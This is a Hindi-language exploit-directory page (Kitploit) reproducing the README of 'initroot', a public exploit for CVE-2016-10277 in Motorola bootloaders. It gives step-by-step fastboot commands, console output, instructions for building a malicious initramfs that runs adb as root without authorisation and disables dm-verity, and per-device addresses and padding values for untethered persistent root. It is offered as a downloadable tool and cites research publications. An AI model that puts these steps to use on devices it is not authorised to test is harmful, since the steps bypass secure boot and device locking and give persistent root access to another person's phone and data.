Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/alephsecurity/initroot
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिस्थायित्व तंत्रभेद्यता विश्लेषणशोषणमोबाइल सुरक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubalephsecurity/initroot

initroot

मोटोरोला अनटेथर्ड जेलब्रेक: सिक्योर बूट और डिवाइस लॉकिंग बाइपास के लिए CVE-2016-10277 का शोषण

रिपॉजिटरी देखें
84248 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

initroot: मोटोरोला बूटलोडर कर्नेल कमांडलाइन इंजेक्शन सिक्योर बूट और डिवाइस लॉकिंग बायपास (CVE-2016-10277)

Roee Hay / Aleph Research, HCL Technologies द्वारा

पहला चरण एक्सप्लॉइट: टेदर्ड जेलब्रेक

यह एक्सप्लॉइट डिवाइस पर अस्थायी, अप्रतिबंधित रूट एक्सेस प्राप्त करता है। उदाहरण के लिए, cedric पर (कुछ संदेश पठनीयता के लिए हटा दिए गए हैं):

root@kitploit:~
$ cd ./tethered/cedric
$ ./initroot-tethered.sh
Welcome to initroot-cedric-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0xA2100000,1588596
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (34319 KB)...
OKAY [  1.098s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.101s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:shell:s0
$ adb shell
cedric:/ # 

दूसरा चरण एक्सप्लॉइट: अनटेदर्ड जेलब्रेक

यह एक्सप्लॉइट डिवाइस पर स्थायी रूट एक्सेस प्राप्त करता है। उदाहरण के लिए, athene पर (पठनीयता के लिए कुछ संदेश हटा दिए गए हैं):

root@kitploit:~
$ cd ./untethered/athene
$ ./initroot-untethered.sh 
Welcome to initroot-athene-untethered
Welcome to initroot-athene-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0x92000000,2505052
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (35214 KB)...
OKAY [  1.131s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.138s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
padC-initroot: 1 file pushed. 11.1 MB/s (22937600 bytes in 1.963s)
44800+0 records in
44800+0 records out
22937600 bytes transferred in 3.017 secs (7602784 bytes/sec)
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a rdinit= root=/dev/mmcblk0p41
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
rebooting...

finished. total time: 0.815s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
athene:/ # 

अपना खुद का दुर्भावनापूर्ण initramfs आर्काइव बनाना

  1. कमिट किए गए initroot-<device>.cpio.gz का उपयोग करें, या अपना खुद का बनाएं:
root@kitploit:~
$ cd <initramfs folder>
$ find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../initroot-<device>.cpio.gz
OR if padding is needed:
$ dd if=/dev/zero of=../pad ibs=1 count=<PAD_SIZE>
$ cp ../pad ../initroot-<device>.cpio.gz && find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../tmp && ls -la ../tmp && cat ../tmp >> ../initroot-<device>.cpio.gz  && rm -fr ../tmp
$ cd ..
  1. हमारी कमिट की गई initramfs इमेजों में डिफ़ॉल्ट रूप से adb रूट के रूप में चलता है। यह प्राधिकरण नहीं मांगेगा। इसके अलावा, संबंधित पार्टीशनों पर dm-verity अक्षम है।
root@kitploit:~
fastboot oem config fsg-id "a initrd=<SCRATCH_ADDR+PAD_SIZE>,<initroot.cpio.gz size-PAD_SIZE>"`
fastboot flash foo initroot-<device>.cpio.gz`
fastboot continue
  1. यदि आप हमारे initramfs का उपयोग करते हैं, तो adb shell अब आपको रूट शेल देगा:
root@kitploit:~
$ adb shell
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0

अन्य Moto डिवाइसों के लिए अनटेदर्ड एक्सप्लॉइट बनाना

हमारा ब्लॉग पोस्ट पढ़ें

सत्यापित डिवाइस

सामुदायिक रिपोर्टें

नोट

यह भेद्यता अन्य Motorola डिवाइसों को भी प्रभावित कर सकती है: एक भिन्न initramfs की आवश्यकता होगी। initrd का एक भिन्न भौतिक पता (SCRATCH_ADDR)। PADDING भी भिन्न हो सकता है।

वीडियो डेमो

CVE-2016-10277 का वीडियो डेमो

प्रकाशन

  1. initroot: Bypassing Nexus 6 Secure Boot through Kernel Command-line Injection
  2. initroot: Hello Moto
  3. Motorola Android Bootloader Kernel Cmdline Injection Secure Boot Bypass
  4. Untethered initroot (USENIX WOOT '17)
  5. USENIX WOOT '17 पेपर
टूल डाउनलोड करें
डिवाइसकोडनेमSCRATCH_ADDRPADDINGकमिट किया गया initramsअप्रयुक्त पार्टीशन
Nexus 6shamu0x110000000x0AOSP userdebugmmcblk0p11
Moto G5 (XT1676)cedric0xA01000000x2000000रिलीज़; SELinux अक्षम करने, shell हेतु set{u,g}id, capabilities ड्रॉप और adb auth को हटाने के लिए init और adbd पैच किए गए, आदिmmcblk0p41
Moto G4 (XT1622)athene0x900000000x2000000""mmcblk0p48
डिवाइसकोडनेमSCRATCH_ADDRरिपोर्टकर्ताविवरण
Moto G5 Pluspotter0xA0100000drbeatबूट प्रॉपर्टी इंजेक्ट की गई। [प्रमाण]
Moto G4 Play (XT1607)harpia0x90000000m-mullinsAmazon XT1607 का पूर्ण एक्सप्लॉइटेशन। [प्रमाण]
Moto G4 Play (XT1609)harpia0x90000000@utoprimeVerizon XT1609 का पूर्ण एक्सप्लॉइटेशन। [प्रमाण]
Moto G4 (XT1625)athene0x90000000@EWorcelइंजेक्ट किया गया initrd जिससे बूट लूप उत्पन्न हुए। [प्रमाण]
Moto G3osprey0x90000000@asiekierkaइंजेक्ट किया गया initrd जिससे बूट लूप उत्पन्न हुए। [प्रमाण]
Moto G2 (XT1072)thea0x11000000@TheElixइंजेक्ट किए गए initrd से बूट लूप उत्पन्न हुए। [प्रमाण]
Moto G (XT1032)falcon_retfr0x11000000Pierre Zurek64MB पैडिंग के साथ पूर्ण एक्सप्लॉइटेशन [प्रमाण]
Moto E (XT830C)condor_cdma0x0E000000fetcherTracfone/Verizon में लॉक XT830C का 32MB पैडिंग के साथ पूर्ण एक्सप्लॉइटेशन [प्रमाण]
अन्य--@jcase[प्रमाण]